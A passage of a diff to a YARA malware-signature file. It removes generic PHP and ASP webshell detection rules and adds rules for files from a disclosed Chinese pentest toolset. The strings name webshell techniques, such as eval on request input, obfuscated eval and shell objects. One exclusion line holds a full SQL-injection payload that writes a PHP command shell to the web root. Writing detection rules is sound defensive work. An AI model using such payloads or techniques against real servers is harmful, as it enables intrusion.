-		$pbs89 = "eval($_HEADERS" wide ascii
-		$pbs90 = ">Infinity-Sh3ll<" ascii
-		$front1 = "<?php eval(" nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii
+		$s12 = "OnGetPassword" fullword ascii
 
 	condition:
-		filesize < 1000KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( any of ( $pbs* ) or $front1 in ( 0 .. 60 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 5890KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Strings_SUSP : FILE
+rule SIGNATURE_BASE_CN_Honker_ASP_Wshell : FILE
 {
 	meta:
-		description = "typical webshell strings, suspicious"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "25f25df5-4398-562b-9383-e01ccb17e8de"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2671-L2757"
+		description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "028136cd-129b-5d58-a4c2-ba730a798c06"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L83-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0dd568dbe946b5aa4e1d33eab1decbd71903ea04"
-		hash = "dde2bdcde95730510b22ae8d52e4344997cb1e74"
-		hash = "499db4d70955f7d40cf5cbaf2ecaf7a2"
-		hash = "281b66f62db5caab2a6eb08929575ad95628a690"
-		hash = "1ab3ae4d613b120f9681f6aa8933d66fa38e4886"
-		logic_hash = "5c3837ab761ee2209fab5fc333b050a56d80addb03b088ae28040c7393429bb3"
-		score = 50
-		quality = 15
+		hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
+		logic_hash = "f6f83acb76248a1b00f1acac621e68888c93b34d4813d8f8613d5d9095c53a8a"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sstring1 = "eval(\"?>\"" nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+		$s1 = "UserPass="
+		$s2 = "VerName="
+		$s3 = "StateName="
 
 	condition:
-		filesize < 700KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) )
+		uint16( 0 ) == 0x253c and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_In_Htaccess : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Iis7 : FILE
 {
 	meta:
-		description = "Use Apache .htaccess to execute php code inside .htaccess"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0f5edff9-22b2-50c9-ae81-72698ea8e7db"
-		date = "2021-01-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2759-L2781"
+		description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L102-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
-		hash = "d79e9b13a32a9e9f3fa36aa1a4baf444bfd2599a"
-		hash = "e1d1091fee6026829e037b2c70c228344955c263"
-		hash = "c026d4512a32d93899d486c6f11d1e13b058a713"
-		hash = "8c9e65cd3ef093cd9c5b418dc5116845aa6602bc92b9b5991b27344d8b3f7ef2"
-		logic_hash = "0652a4cb0cb6c61afece5c2e4cbf2f281714509f0d828047f2e3ccd411602115"
-		score = 75
+		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
+		logic_hash = "91ceec96297e5cc027e261fd708899787b9be4ac15e209e0734a3b8563ae31b5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$hta = "AddType application/x-httpd-php .htaccess" wide ascii
+		$s0 = "\\\\localhost" fullword ascii
+		$s1 = "iis.run" fullword ascii
+		$s3 = ">Could not connecto %s" fullword ascii
+		$s4 = "WinSta0\\Default" fullword ascii
 
 	condition:
-		filesize < 100KB and $hta
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Function_Via_Get : FILE
+rule SIGNATURE_BASE_CN_Honker_Segmentweapon : FILE
 {
 	meta:
-		description = "Webshell which sends eval/assert via GET"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5fef1063-2f9f-516e-86f6-cfd98bb05e6e"
-		date = "2021-01-09"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2783-L2827"
+		description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L121-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ce739d65c31b3c7ea94357a38f7bd0dc264da052d4fd93a1eabb257f6e3a97a6"
-		hash = "d870e971511ea3e082662f8e6ec22e8a8443ca79"
-		hash = "73fa97372b3bb829835270a5e20259163ecc3fdbf73ef2a99cb80709ea4572be"
-		logic_hash = "309203db8e7374531d359e3a723418d47bead45034c4a7bd726fb714622dc039"
-		score = 75
-		quality = 58
+		hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
+		logic_hash = "9afb70a3ae158b7abbda6725b8c9901121b78fa0e874db12b4ac08bf59b26fb5"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sr0 = /\$_GET\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
-		$sr1 = /\$_POST\s?\[.{1,30}\]\(\$_GET\s?\[/ wide ascii
-		$sr2 = /\$_POST\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
-		$sr3 = /\$_GET\s?\[.{1,30}\]\(\$_POST\s?\[/ wide ascii
-		$sr4 = /\$_REQUEST\s?\[.{1,30}\]\(\$_REQUEST\s?\[/ wide ascii
-		$sr5 = /\$_SERVER\s?\[HTTP_.{1,30}\]\(\$_SERVER\s?\[HTTP_/ wide ascii
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii
+		$s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
 
 	condition:
-		filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Writer : FILE
+rule SIGNATURE_BASE_CN_Honker_Alien_Iispwd : FILE
 {
 	meta:
-		description = "PHP webshell which only writes an uploaded file to disk"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "05bb3e0c-69b2-5176-a3eb-e6ba2d72a205"
-		date = "2021-04-17"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2829-L2919"
+		description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L138-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ec83d69512aa0cc85584973f5f0850932fb1949fb5fb2b7e6e5bbfb121193637"
-		hash = "407c15f94a33232c64ddf45f194917fabcd2e83cf93f38ee82f9720e2635fa64"
-		hash = "988b125b6727b94ce9a27ea42edc0ce282c5dfeb"
-		hash = "0ce760131787803bbef216d0ee9b5eb062633537"
-		hash = "20281d16838f707c86b1ff1428a293ed6aec0e97"
-		logic_hash = "34bae0c02156d1c9fd24d674443322409eba0a43e094fc6c05df94bbbe15aa64"
-		score = 50
-		quality = 17
+		hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
+		logic_hash = "16dc6ec4b668fdc43e3a9a8ea31ad0caa1a80b1015ab60eec0eb76bfacd69c5f"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sus3 = "'upload'" wide ascii
-		$sus4 = "\"upload\"" wide ascii
-		$sus5 = "\"Upload\"" wide ascii
-		$sus6 = "gif89" wide ascii
-		$sus16 = "Army" fullword wide ascii
-		$sus17 = "error_reporting( 0 )" wide ascii
-		$sus18 = "' . '" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$php_multi_write1 = "fopen(" wide ascii
-		$php_multi_write2 = "fwrite(" wide ascii
-		$php_write1 = "move_uploaded_file" fullword wide ascii
-		$php_write2 = "copy" fullword wide ascii
+		$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii
+		$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) and ( filesize < 400 or ( filesize < 4000 and 1 of ( $sus* ) ) )
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Writer : FILE
+rule SIGNATURE_BASE_CN_Honker_Md5Cracktools : FILE
 {
 	meta:
-		description = "ASP webshell which only writes an uploaded file to disk"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a1310e22-f485-5f06-8f1a-4cf9ae8413a1"
-		date = "2021-03-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2921-L3091"
+		description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L155-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "df6eaba8d643c49c6f38016531c88332e80af33c"
-		hash = "83642a926291a499916e8c915dacadd0d5a8b91f"
-		hash = "5417fad68a6f7320d227f558bf64657fe3aa9153"
-		hash = "97d9f6c411f54b56056a145654cd00abca2ff871"
-		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
-		logic_hash = "7c9f4c9a5005efad02760cf9ba3ea946068ae281cda10215bf8c88f209b582a5"
-		score = 60
-		quality = -100
+		hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
+		logic_hash = "a176393c0324bcc634a31c261aa6b528fb5a5893c40a5534b34253a1922c8285"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sus1 = "password" fullword wide ascii
-		$sus2 = "pwd" fullword wide ascii
-		$sus3 = "<asp:TextBox" fullword nocase wide ascii
-		$sus4 = "\"upload\"" wide ascii
-		$sus5 = "\"Upload\"" wide ascii
-		$sus6 = "gif89" wide ascii
-		$sus7 = "\"&\"" wide ascii
-		$sus8 = "authkey" fullword wide ascii
-		$sus9 = "AUTHKEY" fullword wide ascii
-		$sus10 = "test.asp" fullword wide ascii
-		$sus11 = "cmd.asp" fullword wide ascii
-		$sus12 = ".Write(Request." wide ascii
-		$sus13 = "<textarea " wide ascii
-		$sus14 = "\"unsafe" fullword wide ascii
-		$sus15 = "'unsafe" fullword wide ascii
-		$sus16 = "Army" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_input1 = "request" fullword nocase wide ascii
-		$asp_input2 = "Page_Load" fullword nocase wide ascii
-		$asp_input3 = "UmVxdWVzdC5Gb3JtK" fullword wide ascii
-		$asp_xml_http = "Microsoft.XMLHTTP" fullword nocase wide ascii
-		$asp_xml_method1 = "GET" fullword wide ascii
-		$asp_xml_method2 = "POST" fullword wide ascii
-		$asp_xml_method3 = "HEAD" fullword wide ascii
-		$asp_form1 = "<form " wide ascii
-		$asp_form2 = "<Form " wide ascii
-		$asp_form3 = "<FORM " wide ascii
-		$asp_asp = "<asp:" wide ascii
-		$asp_text1 = ".text" wide ascii
-		$asp_text2 = ".Text" wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( filesize < 400 or ( filesize < 6000 and 1 of ( $sus* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 4580KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_OBFUSC : FILE
+rule SIGNATURE_BASE_CN_Honker_Coolscan_Scan : FILE
 {
 	meta:
-		description = "ASP webshell obfuscated"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3960b692-9f6f-52c5-b881-6f9e1b3ac555"
-		date = "2021-01-12"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3093-L3368"
+		description = "Sample from CN Honker Pentest Toolset - file scan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "781446d2-3363-56c3-9767-c7ac70047b68"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L172-L187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ad597eee256de51ffb36518cd5f0f4aa0f254f27517d28fb7543ae313b15e112"
-		hash = "e0d21fdc16e0010b88d0197ebf619faa4aeca65243f545c18e10859469c1805a"
-		hash = "54a5620d4ea42e41beac08d8b1240b642dd6fd7c"
-		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
-		hash = "be2fedc38fc0c3d1f925310d5156ccf3d80f1432"
-		hash = "3175ee00fc66921ebec2e7ece8aa3296d4275cb5"
-		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
-		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
-		logic_hash = "96369062f963c3604c05808755fdfca922e5a6da960cb0ee05dee2df72d5d69b"
-		score = 75
-		quality = -117
+		hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
+		logic_hash = "89c7d24d821e907f79ab5630eed13275c5216cff6bf203b5c8f66bb1a178039b"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$asp_obf1 = "/*-/*-*/" wide ascii
-		$asp_obf2 = "u\"+\"n\"+\"s" wide ascii
-		$asp_obf3 = "\"e\"+\"v" wide ascii
-		$asp_obf4 = "a\"+\"l\"" wide ascii
-		$asp_obf5 = "\"+\"(\"+\"" wide ascii
-		$asp_obf6 = "q\"+\"u\"" wide ascii
-		$asp_obf7 = "\"u\"+\"e" wide ascii
-		$asp_obf8 = "/*//*/" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
-		$o4 = "\\x8" wide ascii
-		$o5 = "\\x9" wide ascii
-		$o6 = "\\61" wide ascii
-		$o7 = "\\44" wide ascii
-		$o8 = "\\112" wide ascii
-		$o9 = "\\120" wide ascii
-		$m_multi_one1 = "Replace(" wide ascii
-		$m_multi_one2 = "Len(" wide ascii
-		$m_multi_one3 = "Mid(" wide ascii
-		$m_multi_one4 = "mid(" wide ascii
-		$m_multi_one5 = ".ToString(" wide ascii
-		$m_fp1 = "Author: Andre Teixeira - andret@microsoft.com"
-		$m_fp2 = "DataBinder.Eval(Container.DataItem" ascii wide
-		$oo1 = /\w\"&\"\w/ wide ascii
